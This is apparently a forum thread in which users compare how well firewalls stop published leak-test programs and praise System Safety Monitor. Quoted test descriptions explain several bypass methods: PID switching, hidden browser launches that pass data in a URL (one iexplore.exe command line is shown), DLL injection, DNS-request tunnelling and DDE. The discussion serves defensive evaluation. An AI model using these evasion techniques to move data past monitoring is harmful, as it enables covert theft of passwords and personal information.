So in other words - none of the buggers work...if compromised.
Some firewalls catch some of these simple exploits. None listed catch them all.
System Safety Monitor! This caught all of them dead in their tracks!
Check out System Safety Monitor:
http://maxcomputing.narod.ru/ssme.html?lang=en (535k dl.)
It does what I had "thought" Kerio and other firewalls did. It only allows the
programs that you give permission to run. While Kerio creates an MD5 checksum
for each application and has path verification there are simple ways to avoid
being caught.
-------------------------------------------------------------------------------------------
A couple of the demo programs fork child processes and closed the parent process
before execution. Unable to locate the parent PID most firewalls listed simply
let the child PID run. This is so incredibly easy to do codewise that it's hard
to believe the so many firewalls never thought to check for this.
Categories : timing attack:
"Generally, when an application access the Internet, firewall uses Windows API
to retrieve the parent PID and name (the executable which launch the trusted
application) and when they have it, they freeze it (suspend) and ask you what to
do (allow/deny).
To prevent to be seen, Ghost once it has given information to send to the
default browser, change of PID by shuting down itself and restarting itself to
continue to send data."
-------------------------------------------------------------------------------------------
This one simply launches a hidden browser window. Again, incredibly simple to
do. It sends nor receives data. It uses the browser to do this, as the browser
has firewall permissions set.
Kerio and XP firewalls are vulnerable.
Categories : launcher
"Tooleaky opens your default web browser with the following command line :
iexplore.exe
http://grc.com/lt/leaktest.htm?PersonalInfoGoesHere
The launched window is hidden. If the web browser is allowed to access to port
80, all data will able to be transmitted to remote adress (in our case GRC.com).
Keep in mind that this information could be password or credit card number by a
real malicious program..."
-------------------------------------------------------------------------------------------
This one uses the previous method of launching a hidden browser window with a
bit more sophisticated trickery:
Categories : launcher, DLL injection
"FireHole uses default web browser to transmit data to a remote host.
To do this, it installs a DLL file (with interception function inside) on user's
computer.
After, this DLL loads itself to be in same process space than application aimed,
here a trusted one, so FireHole has great probability to access the Internet
stealthly.
Meaning :
If the test is a success, this means 2 things : your firewall doesn't control
applications that launch others, and is in addition vulnerable to DLL
injection."
-------------------------------------------------------------------------------------------
Categories: : recursive request
"By default on NT OSs since windows 2000, a Windows service 'DNS client' is
running and handles all DNS requests. Thus, all DNS requests coming from various
applications you can have will be transmitted to the DNS client (SVCHOST.EXE
under XP) which will, itself, do the DNS request.
This behaviour can be used to transmit data to a remote computer by crafting a
special DNS request without the firewalls notice it. Indeed, the DNS client
windows service must be allowed to acces the Internet. DNStester uses this kind
of DNS recursive request to bypass your firewall."
-------------------------------------------------------------------------------------------
A launcher with a simple twist. It uses an old protocol to avoid detection:
Categories: : launcher
"Many firewalls now catch the direct ShellExecute or CreateProcess while calling
Internet Explorer and giving it paramaters. To avoid that, Surfer creates a
hidden desktop and launch IE inside it with no url, so no network access. It
then launch another instance of itself, and close the first one. Then it use the
DDE protocol (Direct Data Exchange).
DDE is an old protocol for inter-process data exchange (very similar to OLE).
Netscape has developed a DDE interface for his browser and all major ones,
including IE.
The paramaters are so provided to IE via DDE, and not via a direct call while
launching it.
Meaning :
If the test is a success, this means that your firewall does not check for the
DDE inter-process protocol, or that his parent/child monitoring is not strong
enough.
Note that DDE could be used on an already running IE instance, and would just be
less stealth this way, but possible."
-------------------------------------------------------------------------------------------
I run proxomitron, scriptstop, plus a number of other tweaks etc and
some pretty harsh settings for the browser..along with apps that have
some robustness ( Pegasus etc ) - but ultimately I keep a ghost
archive of the OS and data drives as a fallback.
Your ghost archive is very good, along with the rest.
I must be doing something right - the only exploit I've ever had was a
virus.. and that was down to my own stupidity ( yeah, I clicked on the
pif to see what would happen! ).
I've been hit twice, possibly three times, and I have no clue as to how. I only
run Spywareblaster, Kerio 2.1.5 and had what I thought were good browser
settings. The actual XP services running did not affect these particular
exploits.
From what's been said here it seems that by far the best protection is
not to allow any exploits on the system in the first place..once
they're there, it's all over bar the shouting.
I am trying another program suggested, Abtrusioner Protector today:
NT, 2K, XP only
http://www.abtrusion.com/
It looks like System Safety Monitor alone catches these known and published
exploits by checking each executable before allowing it to run. As to what
unknown, unpublished, and possibly more sophisticated exploits go... ?
I feel much better with SSM right now though!
Thanks again Jo and Aaron for the valuable info. I had no idea that it was so
easy to end run a firewall.
